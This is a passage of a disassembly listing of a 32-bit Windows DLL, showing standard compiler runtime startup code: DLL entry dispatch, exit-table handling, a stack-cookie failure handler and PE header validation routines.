1000132a: 8b 79 04 mov 0x4(%ecx),%edi 362 | 1000132d: 8b 35 24 20 00 10 mov 0x10002024,%esi 363 | 10001333: 89 45 0c mov %eax,0xc(%ebp) 364 | 10001336: 50 push %eax 365 | 10001337: bb 54 33 00 10 mov $0x10003354,%ebx 366 | 1000133c: eb 18 jmp 0x10001356 367 | 1000133e: 33 c0 xor %eax,%eax 368 | 10001340: e9 c9 01 00 00 jmp 0x1000150e 369 | 10001345: 3b c7 cmp %edi,%eax 370 | 10001347: 74 17 je 0x10001360 371 | 10001349: 68 e8 03 00 00 push $0x3e8 372 | 1000134e: ff 15 28 20 00 10 call *0x10002028 373 | 10001354: 6a 00 push $0x0 374 | 10001356: 57 push %edi 375 | 10001357: 53 push %ebx 376 | 10001358: ff d6 call *%esi 377 | 1000135a: 85 c0 test %eax,%eax 378 | 1000135c: 75 e7 jne 0x10001345 379 | 1000135e: eb 07 jmp 0x10001367 380 | 10001360: c7 45 0c 01 00 00 00 movl $0x1,0xc(%ebp) 381 | 10001367: a1 50 33 00 10 mov 0x10003350,%eax 382 | 1000136c: 6a 02 push $0x2 383 | 1000136e: 5e pop %esi 384 | 1000136f: 85 c0 test %eax,%eax 385 | 10001371: 74 09 je 0x1000137c 386 | 10001373: 6a 1f push $0x1f 387 | 10001375: e8 50 06 00 00 call 0x100019ca 388 | 1000137a: eb 3c jmp 0x100013b8 389 | 1000137c: 68 90 20 00 10 push $0x10002090 390 | 10001381: 68 88 20 00 10 push $0x10002088 391 | 10001386: c7 05 50 33 00 10 01 movl $0x1,0x10003350 392 | 1000138d: 00 00 00 393 | 10001390: e8 2f 06 00 00 call 0x100019c4 394 | 10001395: 59 pop %ecx 395 | 10001396: 59 pop %ecx 396 | 10001397: 85 c0 test %eax,%eax 397 | 10001399: 74 07 je 0x100013a2 398 | 1000139b: 33 c0 xor %eax,%eax 399 | 1000139d: e9 69 01 00 00 jmp 0x1000150b 400 | 100013a2: 68 84 20 00 10 push $0x10002084 401 | 100013a7: 68 80 20 00 10 push $0x10002080 402 | 100013ac: e8 0d 06 00 00 call 0x100019be 403 | 100013b1: 59 pop %ecx 404 | 100013b2: 89 35 50 33 00 10 mov %esi,0x10003350 405 | 100013b8: 33 ff xor %edi,%edi 406 | 100013ba: 59 pop %ecx 407 | 100013bb: 39 7d 0c cmp %edi,0xc(%ebp) 408 | 100013be: 75 08 jne 0x100013c8 409 | 100013c0: 57 push %edi 410 | 100013c1: 53 push %ebx 411 | 100013c2: ff 15 2c 20 00 10 call 
*0x1000202c 412 | 100013c8: 39 3d 60 33 00 10 cmp %edi,0x10003360 413 | 100013ce: 74 1c je 0x100013ec 414 | 100013d0: 68 60 33 00 10 push $0x10003360 415 | 100013d5: e8 26 05 00 00 call 0x10001900 416 | 100013da: 59 pop %ecx 417 | 100013db: 85 c0 test %eax,%eax 418 | 100013dd: 74 0d je 0x100013ec 419 | 100013df: ff 75 10 pushl 0x10(%ebp) 420 | 100013e2: 56 push %esi 421 | 100013e3: ff 75 08 pushl 0x8(%ebp) 422 | 100013e6: ff 15 60 33 00 10 call *0x10003360 423 | 100013ec: ff 05 10 30 00 10 incl 0x10003010 424 | 100013f2: e9 11 01 00 00 jmp 0x10001508 425 | 100013f7: 39 45 0c cmp %eax,0xc(%ebp) 426 | 100013fa: 0f 85 08 01 00 00 jne 0x10001508 427 | 10001400: 64 a1 18 00 00 00 mov %fs:0x18,%eax 428 | 10001406: 8b 78 04 mov 0x4(%eax),%edi 429 | 10001409: 83 65 fc 00 andl $0x0,-0x4(%ebp) 430 | 1000140d: 8b 35 24 20 00 10 mov 0x10002024,%esi 431 | 10001413: bb 54 33 00 10 mov $0x10003354,%ebx 432 | 10001418: eb 0f jmp 0x10001429 433 | 1000141a: 3b c7 cmp %edi,%eax 434 | 1000141c: 74 17 je 0x10001435 435 | 1000141e: 68 e8 03 00 00 push $0x3e8 436 | 10001423: ff 15 28 20 00 10 call *0x10002028 437 | 10001429: 6a 00 push $0x0 438 | 1000142b: 57 push %edi 439 | 1000142c: 53 push %ebx 440 | 1000142d: ff d6 call *%esi 441 | 1000142f: 85 c0 test %eax,%eax 442 | 10001431: 75 e7 jne 0x1000141a 443 | 10001433: eb 07 jmp 0x1000143c 444 | 10001435: c7 45 fc 01 00 00 00 movl $0x1,-0x4(%ebp) 445 | 1000143c: a1 50 33 00 10 mov 0x10003350,%eax 446 | 10001441: 83 f8 02 cmp $0x2,%eax 447 | 10001444: 74 0d je 0x10001453 448 | 10001446: 6a 1f push $0x1f 449 | 10001448: e8 7d 05 00 00 call 0x100019ca 450 | 1000144d: 59 pop %ecx 451 | 1000144e: e9 b5 00 00 00 jmp 0x10001508 452 | 10001453: ff 35 5c 33 00 10 pushl 0x1000335c 453 | 10001459: 8b 35 64 20 00 10 mov 0x10002064,%esi 454 | 1000145f: ff d6 call *%esi 455 | 10001461: 59 pop %ecx 456 | 10001462: 89 45 0c mov %eax,0xc(%ebp) 457 | 10001465: 85 c0 test %eax,%eax 458 | 10001467: 0f 84 87 00 00 00 je 0x100014f4 459 | 1000146d: ff 35 58 33 
00 10 pushl 0x10003358 460 | 10001473: ff d6 call *%esi 461 | 10001475: 8b f8 mov %eax,%edi 462 | 10001477: 8b 45 0c mov 0xc(%ebp),%eax 463 | 1000147a: 59 pop %ecx 464 | 1000147b: 89 45 10 mov %eax,0x10(%ebp) 465 | 1000147e: 89 7d 08 mov %edi,0x8(%ebp) 466 | 10001481: 83 ef 04 sub $0x4,%edi 467 | 10001484: 3b 7d 0c cmp 0xc(%ebp),%edi 468 | 10001487: 72 51 jb 0x100014da 469 | 10001489: 83 3f 00 cmpl $0x0,(%edi) 470 | 1000148c: 74 f3 je 0x10001481 471 | 1000148e: ff 15 68 20 00 10 call *0x10002068 472 | 10001494: 39 07 cmp %eax,(%edi) 473 | 10001496: 74 e9 je 0x10001481 474 | 10001498: ff 37 pushl (%edi) 475 | 1000149a: ff d6 call *%esi 476 | 1000149c: 89 45 f8 mov %eax,-0x8(%ebp) 477 | 1000149f: ff 15 68 20 00 10 call *0x10002068 478 | 100014a5: 89 07 mov %eax,(%edi) 479 | 100014a7: ff 55 f8 call *-0x8(%ebp) 480 | 100014aa: ff 35 5c 33 00 10 pushl 0x1000335c 481 | 100014b0: ff d6 call *%esi 482 | 100014b2: ff 35 58 33 00 10 pushl 0x10003358 483 | 100014b8: 89 45 f8 mov %eax,-0x8(%ebp) 484 | 100014bb: ff d6 call *%esi 485 | 100014bd: 8b 4d f8 mov -0x8(%ebp),%ecx 486 | 100014c0: 83 c4 0c add $0xc,%esp 487 | 100014c3: 39 4d 10 cmp %ecx,0x10(%ebp) 488 | 100014c6: 75 05 jne 0x100014cd 489 | 100014c8: 39 45 08 cmp %eax,0x8(%ebp) 490 | 100014cb: 74 b4 je 0x10001481 491 | 100014cd: 89 4d 10 mov %ecx,0x10(%ebp) 492 | 100014d0: 89 4d 0c mov %ecx,0xc(%ebp) 493 | 100014d3: 89 45 08 mov %eax,0x8(%ebp) 494 | 100014d6: 8b f8 mov %eax,%edi 495 | 100014d8: eb a7 jmp 0x10001481 496 | 100014da: ff 75 0c pushl 0xc(%ebp) 497 | 100014dd: ff 15 6c 20 00 10 call *0x1000206c 498 | 100014e3: 59 pop %ecx 499 | 100014e4: ff 15 68 20 00 10 call *0x10002068 500 | 100014ea: a3 58 33 00 10 mov %eax,0x10003358 501 | 100014ef: a3 5c 33 00 10 mov %eax,0x1000335c 502 | 100014f4: 33 c0 xor %eax,%eax 503 | 100014f6: a3 50 33 00 10 mov %eax,0x10003350 504 | 100014fb: 39 45 fc cmp %eax,-0x4(%ebp) 505 | 100014fe: 75 08 jne 0x10001508 506 | 10001500: 50 push %eax 507 | 10001501: 53 push %ebx 508 | 10001502: 
ff 15 2c 20 00 10 call *0x1000202c 509 | 10001508: 33 c0 xor %eax,%eax 510 | 1000150a: 40 inc %eax 511 | 1000150b: 5f pop %edi 512 | 1000150c: 5e pop %esi 513 | 1000150d: 5b pop %ebx 514 | 1000150e: c9 leave 515 | 1000150f: c2 0c 00 ret $0xc 516 | 10001512: 6a 10 push $0x10 517 | 10001514: 68 a8 21 00 10 push $0x100021a8 518 | 10001519: e8 ba 04 00 00 call 0x100019d8 519 | 1000151e: 8b f9 mov %ecx,%edi 520 | 10001520: 8b f2 mov %edx,%esi 521 | 10001522: 8b 5d 08 mov 0x8(%ebp),%ebx 522 | 10001525: 33 c0 xor %eax,%eax 523 | 10001527: 40 inc %eax 524 | 10001528: 89 45 e4 mov %eax,-0x1c(%ebp) 525 | 1000152b: 33 c9 xor %ecx,%ecx 526 | 1000152d: 89 4d fc mov %ecx,-0x4(%ebp) 527 | 10001530: 89 35 08 30 00 10 mov %esi,0x10003008 528 | 10001536: 89 45 fc mov %eax,-0x4(%ebp) 529 | 10001539: 3b f1 cmp %ecx,%esi 530 | 1000153b: 75 10 jne 0x1000154d 531 | 1000153d: 39 0d 10 30 00 10 cmp %ecx,0x10003010 532 | 10001543: 75 08 jne 0x1000154d 533 | 10001545: 89 4d e4 mov %ecx,-0x1c(%ebp) 534 | 10001548: e9 b7 00 00 00 jmp 0x10001604 535 | 1000154d: 3b f0 cmp %eax,%esi 536 | 1000154f: 74 05 je 0x10001556 537 | 10001551: 83 fe 02 cmp $0x2,%esi 538 | 10001554: 75 2e jne 0x10001584 539 | 10001556: a1 bc 20 00 10 mov 0x100020bc,%eax 540 | 1000155b: 3b c1 cmp %ecx,%eax 541 | 1000155d: 74 08 je 0x10001567 542 | 1000155f: 57 push %edi 543 | 10001560: 56 push %esi 544 | 10001561: 53 push %ebx 545 | 10001562: ff d0 call *%eax 546 | 10001564: 89 45 e4 mov %eax,-0x1c(%ebp) 547 | 10001567: 83 7d e4 00 cmpl $0x0,-0x1c(%ebp) 548 | 1000156b: 0f 84 93 00 00 00 je 0x10001604 549 | 10001571: 57 push %edi 550 | 10001572: 56 push %esi 551 | 10001573: 53 push %ebx 552 | 10001574: e8 73 fd ff ff call 0x100012ec 553 | 10001579: 89 45 e4 mov %eax,-0x1c(%ebp) 554 | 1000157c: 85 c0 test %eax,%eax 555 | 1000157e: 0f 84 80 00 00 00 je 0x10001604 556 | 10001584: 57 push %edi 557 | 10001585: 56 push %esi 558 | 10001586: 53 push %ebx 559 | 10001587: e8 74 fa ff ff call 0x10001000 560 | 1000158c: 89 45 e4 mov 
%eax,-0x1c(%ebp) 561 | 1000158f: 83 fe 01 cmp $0x1,%esi 562 | 10001592: 75 24 jne 0x100015b8 563 | 10001594: 85 c0 test %eax,%eax 564 | 10001596: 75 20 jne 0x100015b8 565 | 10001598: 57 push %edi 566 | 10001599: 50 push %eax 567 | 1000159a: 53 push %ebx 568 | 1000159b: e8 60 fa ff ff call 0x10001000 569 | 100015a0: 57 push %edi 570 | 100015a1: 6a 00 push $0x0 571 | 100015a3: 53 push %ebx 572 | 100015a4: e8 43 fd ff ff call 0x100012ec 573 | 100015a9: a1 bc 20 00 10 mov 0x100020bc,%eax 574 | 100015ae: 85 c0 test %eax,%eax 575 | 100015b0: 74 06 je 0x100015b8 576 | 100015b2: 57 push %edi 577 | 100015b3: 6a 00 push $0x0 578 | 100015b5: 53 push %ebx 579 | 100015b6: ff d0 call *%eax 580 | 100015b8: 85 f6 test %esi,%esi 581 | 100015ba: 74 05 je 0x100015c1 582 | 100015bc: 83 fe 03 cmp $0x3,%esi 583 | 100015bf: 75 43 jne 0x10001604 584 | 100015c1: 57 push %edi 585 | 100015c2: 56 push %esi 586 | 100015c3: 53 push %ebx 587 | 100015c4: e8 23 fd ff ff call 0x100012ec 588 | 100015c9: 85 c0 test %eax,%eax 589 | 100015cb: 75 03 jne 0x100015d0 590 | 100015cd: 21 45 e4 and %eax,-0x1c(%ebp) 591 | 100015d0: 83 7d e4 00 cmpl $0x0,-0x1c(%ebp) 592 | 100015d4: 74 2e je 0x10001604 593 | 100015d6: a1 bc 20 00 10 mov 0x100020bc,%eax 594 | 100015db: 85 c0 test %eax,%eax 595 | 100015dd: 74 25 je 0x10001604 596 | 100015df: 57 push %edi 597 | 100015e0: 56 push %esi 598 | 100015e1: 53 push %ebx 599 | 100015e2: ff d0 call *%eax 600 | 100015e4: 89 45 e4 mov %eax,-0x1c(%ebp) 601 | 100015e7: eb 1b jmp 0x10001604 602 | 100015e9: 8b 45 ec mov -0x14(%ebp),%eax 603 | 100015ec: 8b 08 mov (%eax),%ecx 604 | 100015ee: 8b 09 mov (%ecx),%ecx 605 | 100015f0: 89 4d e0 mov %ecx,-0x20(%ebp) 606 | 100015f3: 50 push %eax 607 | 100015f4: 51 push %ecx 608 | 100015f5: e8 d6 03 00 00 call 0x100019d0 609 | 100015fa: 59 pop %ecx 610 | 100015fb: 59 pop %ecx 611 | 100015fc: c3 ret 612 | 100015fd: 8b 65 e8 mov -0x18(%ebp),%esp 613 | 10001600: 83 65 e4 00 andl $0x0,-0x1c(%ebp) 614 | 10001604: 83 65 fc 00 andl $0x0,-0x4(%ebp) 
615 | 10001608: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 616 | 1000160f: e8 09 00 00 00 call 0x1000161d 617 | 10001614: 8b 45 e4 mov -0x1c(%ebp),%eax 618 | 10001617: e8 01 04 00 00 call 0x10001a1d 619 | 1000161c: c3 ret 620 | 1000161d: c7 05 08 30 00 10 ff movl $0xffffffff,0x10003008 621 | 10001624: ff ff ff 622 | 10001627: c3 ret 623 | 10001628: 8b ff mov %edi,%edi 624 | 1000162a: 55 push %ebp 625 | 1000162b: 8b ec mov %esp,%ebp 626 | 1000162d: 83 7d 0c 01 cmpl $0x1,0xc(%ebp) 627 | 10001631: 75 05 jne 0x10001638 628 | 10001633: e8 1e 04 00 00 call 0x10001a56 629 | 10001638: ff 75 08 pushl 0x8(%ebp) 630 | 1000163b: 8b 4d 10 mov 0x10(%ebp),%ecx 631 | 1000163e: 8b 55 0c mov 0xc(%ebp),%edx 632 | 10001641: e8 cc fe ff ff call 0x10001512 633 | 10001646: 59 pop %ecx 634 | 10001647: 5d pop %ebp 635 | 10001648: c2 0c 00 ret $0xc 636 | 1000164b: 8b ff mov %edi,%edi 637 | 1000164d: 55 push %ebp 638 | 1000164e: 8b ec mov %esp,%ebp 639 | 10001650: 81 ec 28 03 00 00 sub $0x328,%esp 640 | 10001656: a3 20 31 00 10 mov %eax,0x10003120 641 | 1000165b: 89 0d 1c 31 00 10 mov %ecx,0x1000311c 642 | 10001661: 89 15 18 31 00 10 mov %edx,0x10003118 643 | 10001667: 89 1d 14 31 00 10 mov %ebx,0x10003114 644 | 1000166d: 89 35 10 31 00 10 mov %esi,0x10003110 645 | 10001673: 89 3d 0c 31 00 10 mov %edi,0x1000310c 646 | 10001679: 66 data16 647 | 1000167a: 8c 15 38 31 00 10 mov %ss,0x10003138 648 | 10001680: 66 data16 649 | 10001681: 8c 0d 2c 31 00 10 mov %cs,0x1000312c 650 | 10001687: 66 data16 651 | 10001688: 8c 1d 08 31 00 10 mov %ds,0x10003108 652 | 1000168e: 66 data16 653 | 1000168f: 8c 05 04 31 00 10 mov %es,0x10003104 654 | 10001695: 66 data16 655 | 10001696: 8c 25 00 31 00 10 mov %fs,0x10003100 656 | 1000169c: 66 data16 657 | 1000169d: 8c 2d fc 30 00 10 mov %gs,0x100030fc 658 | 100016a3: 9c pushf 659 | 100016a4: 8f 05 30 31 00 10 popl 0x10003130 660 | 100016aa: 8b 45 00 mov 0x0(%ebp),%eax 661 | 100016ad: a3 24 31 00 10 mov %eax,0x10003124 662 | 100016b2: 8b 45 04 mov 
0x4(%ebp),%eax 663 | 100016b5: a3 28 31 00 10 mov %eax,0x10003128 664 | 100016ba: 8d 45 08 lea 0x8(%ebp),%eax 665 | 100016bd: a3 34 31 00 10 mov %eax,0x10003134 666 | 100016c2: 8b 85 e0 fc ff ff mov -0x320(%ebp),%eax 667 | 100016c8: c7 05 70 30 00 10 01 movl $0x10001,0x10003070 668 | 100016cf: 00 01 00 669 | 100016d2: a1 28 31 00 10 mov 0x10003128,%eax 670 | 100016d7: a3 24 30 00 10 mov %eax,0x10003024 671 | 100016dc: c7 05 18 30 00 10 09 movl $0xc0000409,0x10003018 672 | 100016e3: 04 00 c0 673 | 100016e6: c7 05 1c 30 00 10 01 movl $0x1,0x1000301c 674 | 100016ed: 00 00 00 675 | 100016f0: a1 00 30 00 10 mov 0x10003000,%eax 676 | 100016f5: 89 85 d8 fc ff ff mov %eax,-0x328(%ebp) 677 | 100016fb: a1 04 30 00 10 mov 0x10003004,%eax 678 | 10001700: 89 85 dc fc ff ff mov %eax,-0x324(%ebp) 679 | 10001706: ff 15 10 20 00 10 call *0x10002010 680 | 1000170c: a3 68 30 00 10 mov %eax,0x10003068 681 | 10001711: 6a 01 push $0x1 682 | 10001713: e8 d4 03 00 00 call 0x10001aec 683 | 10001718: 59 pop %ecx 684 | 10001719: 6a 00 push $0x0 685 | 1000171b: ff 15 14 20 00 10 call *0x10002014 686 | 10001721: 68 c0 20 00 10 push $0x100020c0 687 | 10001726: ff 15 18 20 00 10 call *0x10002018 688 | 1000172c: 83 3d 68 30 00 10 00 cmpl $0x0,0x10003068 689 | 10001733: 75 08 jne 0x1000173d 690 | 10001735: 6a 01 push $0x1 691 | 10001737: e8 b0 03 00 00 call 0x10001aec 692 | 1000173c: 59 pop %ecx 693 | 1000173d: 68 09 04 00 c0 push $0xc0000409 694 | 10001742: ff 15 1c 20 00 10 call *0x1000201c 695 | 10001748: 50 push %eax 696 | 10001749: ff 15 20 20 00 10 call *0x10002020 697 | 1000174f: c9 leave 698 | 10001750: c3 ret 699 | 10001751: 68 40 33 00 10 push $0x10003340 700 | 10001756: e8 97 03 00 00 call 0x10001af2 701 | 1000175b: 59 pop %ecx 702 | 1000175c: c3 ret 703 | 1000175d: 6a 14 push $0x14 704 | 1000175f: 68 d0 21 00 10 push $0x100021d0 705 | 10001764: e8 6f 02 00 00 call 0x100019d8 706 | 10001769: ff 35 5c 33 00 10 pushl 0x1000335c 707 | 1000176f: 8b 35 64 20 00 10 mov 0x10002064,%esi 708 | 
10001775: ff d6 call *%esi 709 | 10001777: 59 pop %ecx 710 | 10001778: 89 45 e4 mov %eax,-0x1c(%ebp) 711 | 1000177b: 83 f8 ff cmp $0xffffffff,%eax 712 | 1000177e: 75 0c jne 0x1000178c 713 | 10001780: ff 75 08 pushl 0x8(%ebp) 714 | 10001783: ff 15 74 20 00 10 call *0x10002074 715 | 10001789: 59 pop %ecx 716 | 1000178a: eb 67 jmp 0x100017f3 717 | 1000178c: 6a 08 push $0x8 718 | 1000178e: e8 71 03 00 00 call 0x10001b04 719 | 10001793: 59 pop %ecx 720 | 10001794: 83 65 fc 00 andl $0x0,-0x4(%ebp) 721 | 10001798: ff 35 5c 33 00 10 pushl 0x1000335c 722 | 1000179e: ff d6 call *%esi 723 | 100017a0: 89 45 e4 mov %eax,-0x1c(%ebp) 724 | 100017a3: ff 35 58 33 00 10 pushl 0x10003358 725 | 100017a9: ff d6 call *%esi 726 | 100017ab: 59 pop %ecx 727 | 100017ac: 59 pop %ecx 728 | 100017ad: 89 45 e0 mov %eax,-0x20(%ebp) 729 | 100017b0: 8d 45 e0 lea -0x20(%ebp),%eax 730 | 100017b3: 50 push %eax 731 | 100017b4: 8d 45 e4 lea -0x1c(%ebp),%eax 732 | 100017b7: 50 push %eax 733 | 100017b8: ff 75 08 pushl 0x8(%ebp) 734 | 100017bb: 8b 35 78 20 00 10 mov 0x10002078,%esi 735 | 100017c1: ff d6 call *%esi 736 | 100017c3: 59 pop %ecx 737 | 100017c4: 50 push %eax 738 | 100017c5: e8 34 03 00 00 call 0x10001afe 739 | 100017ca: 89 45 dc mov %eax,-0x24(%ebp) 740 | 100017cd: ff 75 e4 pushl -0x1c(%ebp) 741 | 100017d0: ff d6 call *%esi 742 | 100017d2: a3 5c 33 00 10 mov %eax,0x1000335c 743 | 100017d7: ff 75 e0 pushl -0x20(%ebp) 744 | 100017da: ff d6 call *%esi 745 | 100017dc: 83 c4 14 add $0x14,%esp 746 | 100017df: a3 58 33 00 10 mov %eax,0x10003358 747 | 100017e4: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 748 | 100017eb: e8 09 00 00 00 call 0x100017f9 749 | 100017f0: 8b 45 dc mov -0x24(%ebp),%eax 750 | 100017f3: e8 25 02 00 00 call 0x10001a1d 751 | 100017f8: c3 ret 752 | 100017f9: 6a 08 push $0x8 753 | 100017fb: e8 f8 02 00 00 call 0x10001af8 754 | 10001800: 59 pop %ecx 755 | 10001801: c3 ret 756 | 10001802: 8b ff mov %edi,%edi 757 | 10001804: 55 push %ebp 758 | 10001805: 8b ec mov %esp,%ebp 759 | 
10001807: ff 75 08 pushl 0x8(%ebp) 760 | 1000180a: e8 4e ff ff ff call 0x1000175d 761 | 1000180f: f7 d8 neg %eax 762 | 10001811: 1b c0 sbb %eax,%eax 763 | 10001813: f7 d8 neg %eax 764 | 10001815: 59 pop %ecx 765 | 10001816: 48 dec %eax 766 | 10001817: 5d pop %ebp 767 | 10001818: c3 ret 768 | 10001819: 8b ff mov %edi,%edi 769 | 1000181b: 56 push %esi 770 | 1000181c: b8 98 21 00 10 mov $0x10002198,%eax 771 | 10001821: be 98 21 00 10 mov $0x10002198,%esi 772 | 10001826: 57 push %edi 773 | 10001827: 8b f8 mov %eax,%edi 774 | 10001829: 3b c6 cmp %esi,%eax 775 | 1000182b: 73 0f jae 0x1000183c 776 | 1000182d: 8b 07 mov (%edi),%eax 777 | 1000182f: 85 c0 test %eax,%eax 778 | 10001831: 74 02 je 0x10001835 779 | 10001833: ff d0 call *%eax 780 | 10001835: 83 c7 04 add $0x4,%edi 781 | 10001838: 3b fe cmp %esi,%edi 782 | 1000183a: 72 f1 jb 0x1000182d 783 | 1000183c: 5f pop %edi 784 | 1000183d: 5e pop %esi 785 | 1000183e: c3 ret 786 | 1000183f: 8b ff mov %edi,%edi 787 | 10001841: 56 push %esi 788 | 10001842: b8 a0 21 00 10 mov $0x100021a0,%eax 789 | 10001847: be a0 21 00 10 mov $0x100021a0,%esi 790 | 1000184c: 57 push %edi 791 | 1000184d: 8b f8 mov %eax,%edi 792 | 1000184f: 3b c6 cmp %esi,%eax 793 | 10001851: 73 0f jae 0x10001862 794 | 10001853: 8b 07 mov (%edi),%eax 795 | 10001855: 85 c0 test %eax,%eax 796 | 10001857: 74 02 je 0x1000185b 797 | 10001859: ff d0 call *%eax 798 | 1000185b: 83 c7 04 add $0x4,%edi 799 | 1000185e: 3b fe cmp %esi,%edi 800 | 10001860: 72 f1 jb 0x10001853 801 | 10001862: 5f pop %edi 802 | 10001863: 5e pop %esi 803 | 10001864: c3 ret 804 | 10001865: cc int3 805 | 10001866: cc int3 806 | 10001867: cc int3 807 | 10001868: cc int3 808 | 10001869: cc int3 809 | 1000186a: cc int3 810 | 1000186b: cc int3 811 | 1000186c: cc int3 812 | 1000186d: cc int3 813 | 1000186e: cc int3 814 | 1000186f: cc int3 815 | 10001870: 8b ff mov %edi,%edi 816 | 10001872: 55 push %ebp 817 | 10001873: 8b ec mov %esp,%ebp 818 | 10001875: 8b 4d 08 mov 0x8(%ebp),%ecx 819 | 10001878: b8 4d 
5a 00 00 mov $0x5a4d,%eax 820 | 1000187d: 66 39 01 cmp %ax,(%ecx) 821 | 10001880: 74 04 je 0x10001886 822 | 10001882: 33 c0 xor %eax,%eax 823 | 10001884: 5d pop %ebp 824 | 10001885: c3 ret 825 | 10001886: 8b 41 3c mov 0x3c(%ecx),%eax 826 | 10001889: 03 c1 add %ecx,%eax 827 | 1000188b: 81 38 50 45 00 00 cmpl $0x4550,(%eax) 828 | 10001891: 75 ef jne 0x10001882 829 | 10001893: 33 d2 xor %edx,%edx 830 | 10001895: b9 0b 01 00 00 mov $0x10b,%ecx 831 | 1000189a: 66 39 48 18 cmp %cx,0x18(%eax) 832 | 1000189e: 0f 94 c2 sete %dl 833 | 100018a1: 8b c2 mov %edx,%eax 834 | 100018a3: 5d pop %ebp 835 | 100018a4: c3 ret 836 | 100018a5: cc int3 837 | 100018a6: cc int3 838 | 100018a7: cc int3 839 | 100018a8: cc int3 840 | 100018a9: cc int3 841 | 100018aa: cc int3 842 | 100018ab: cc int3 843 | 100018ac: cc int3 844 | 100018ad: cc int3 845 | 100018ae: cc int3 846 | 100018af: cc int3 847 | 100018b0: 8b ff mov %edi,%edi 848 | 100018b2: 55 push %ebp 849 | 100018b3: 8b ec mov %esp,%ebp 850 | 100018b5: 8b 45 08 mov 0x8(%ebp),%eax 851 | 100018b8: 8b 48 3c mov 0x3c(%eax),%ecx 852 | 100018bb: 03 c8 add %eax,%ecx 853 | 100018bd: 0f b7 41 14 movzwl 0x14(%ecx),%eax 854 | 100018c1: 53 push %ebx 855 | 100018c2: 56 push %esi 856 | 100018c3: 0f b7 71 06 movzwl 0x6(%ecx),%esi 857 | 100018c7: 33 d2 xor %edx,%edx 858 | 100018c9: 57 push %edi 859 | 100018ca: 8d 44 08 18 lea 0x18(%eax,%ecx,1),%eax 860 | 100018ce: 85 f6 test %esi,%esi 861 | 100018d0: 76 1b jbe 0x100018ed 862 | 100018d2: 8b 7d 0c mov 0xc(%ebp),%edi 863 | 100018d5: 8b 48 0c mov 0xc(%eax),%ecx 864 | 100018d8: 3b f9 cmp %ecx,%edi 865 | 100018da: 72 09 jb 0x100018e5 866 | 100018dc: 8b 58 08 mov 0x8(%eax),%ebx 867 | 100018df: 03 d9 add %ecx,%ebx 868 | 100018e1: 3b fb cmp %ebx,%edi 869 | 100018e3: 72 0a jb 0x100018ef 870 | 100018e5: 42 inc %edx 871 | 100018e6: 83 c0 28 add $0x28,%eax 872 | 100018e9: 3b d6 cmp %esi,%edx 873 | 100018eb: 72 e8 jb 0x100018d5 874 | 100018ed: 33 c0 xor %eax,%eax 875 | 100018ef: 5f pop %edi 876 | 100018f0: 5e pop %esi 
877 | 100018f1: 5b pop %ebx 878 | 100018f2: 5d pop %ebp 879 | 100018f3: c3 ret 880 | 100018f4: cc int3 881 | 100018f5: cc int3 882 | 100018f6: cc int3 883 | 100018f7: cc int3 884 | 100018f8: cc int3 885 | 100018f9: cc int3 886 | 100018fa: cc int3 887 | 100018fb: cc int3 888 | 100018fc: cc int3 889 | 100018fd: cc int3 890 | 100018fe: cc int3 891 | 100018ff: cc int3 892 | 10001900: 8b ff mov %edi,%edi 893 | 10001902: 55 push %ebp 894 | 10001903: 8b ec mov %esp,%ebp 895 | 10001905: 6a fe push $0xfffffffe 896 | 10001907: 68 f0 21 00 10 push $0x100021f0 897 | 1000190c: 68 31 1a 00 10 push $0x10001a31 898 | 10001911: 64 a1 00 00 00 00 mov %fs:0x0,%eax 899 | 10001917: 50 push %eax 900 | 10001918: 83 ec 08 sub $0x8,%esp 901 | 1000191b: 53 push %ebx 902 | 1000191c: 56 push %esi 903 | 1000191d: 57 push %edi 904 | 1000191e: a1 00 30 00 10 mov 0x10003000,%eax 905 | 10001923: 31 45 f8 xor %eax,-0x8(%ebp) 906 | 10001926: 33 c5 xor %ebp,%eax 907 | 10001928: 50 push %eax 908 | 10001929: 8d 45 f0 lea -0x10(%ebp),%eax 909 | 1000192c: 64 a3 00 00 00 00 mov %eax,%fs:0x0 910 | 10001932: 89 65 e8 mov %esp,-0x18(%ebp) 911 | 10001935: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp) 912 | 1000193c: 68 00 00 00 10 push $0x10000000 913 | 10001941: e8 2a ff ff ff call 0x10001870 914 | 10001946: 83 c4 04 add $0x4,%esp 915 | 10001949: 85 c0 test %eax,%eax 916 | 1000194b: 74 55 je 0x100019a2 917 | 1000194d: 8b 45 08 mov 0x8(%ebp),%eax 918 | 10001950: 2d 00 00 00 10 sub $0x10000000,%eax 919 | 10001955: 50 push %eax 920 | 10001956: 68 00 00 00 10 push $0x10000000 921 | 1000195b: e8 50 ff ff ff call 0x100018b0 922 | 10001960: 83 c4 08 add $0x8,%esp 923 | 10001963: 85 c0 test %eax,%eax 924 | 10001965: 74 3b je 0x100019a2 925 | 10001967: 8b 40 24 mov 0x24(%eax),%eax 926 | 1000196a: c1 e8 1f shr $0x1f,%eax 927 | 1000196d: f7 d0 not %eax 928 | 1000196f: 83 e0 01 and $0x1,%eax 929 | 10001972: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 930 | 10001979: 8b 4d f0 mov -0x10(%ebp),%ecx 931 | 1000197c: 64 89 
0d 00 00 00 00 mov %ecx,%fs:0x0 932 | 10001983: 59 pop %ecx 933 | 10001984: 5f pop %edi 934 | 10001985: 5e pop %esi 935 | 10001986: 5b pop %ebx 936 | 10001987: 8b e5 mov %ebp,%esp 937 | 10001989: 5d pop %ebp 938 | 1000198a: c3 ret 939 | 1000198b: 8b 45 ec mov -0x14(%ebp),%eax 940 | 1000198e: 8b 08 mov (%eax),%ecx 941 | 10001990: 8b 01 mov (%ecx),%eax 942 | 10001992: 33 d2 xor %edx,%edx 943 | 10001994: 3d 05 00 00 c0 cmp $0xc0000005,%eax 944 | 10001999: 0f 94 c2 sete %dl 945 | 1000199c: 8b c2 mov %edx,%eax 946 | 1000199e: c3 ret 947 | 1000199f: 8b 65 e8 mov -0x18(%ebp),%esp 948 | 100019a2: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 949 | 100019a9: 33 c0 xor %eax,%eax 950 | 100019ab: 8b 4d f0 mov -0x10(%ebp),%ecx 951 | 100019ae: 64 89 0d 00 00 00 00 mov %ecx,%fs:0x0 952 | 100019b5: 59 pop %ecx 953 | 100019b6: 5f pop %edi 954 | 100019b7: 5e pop %esi 955 | 100019b8: 5b pop %ebx 956 | 100019b9: 8b e5 mov 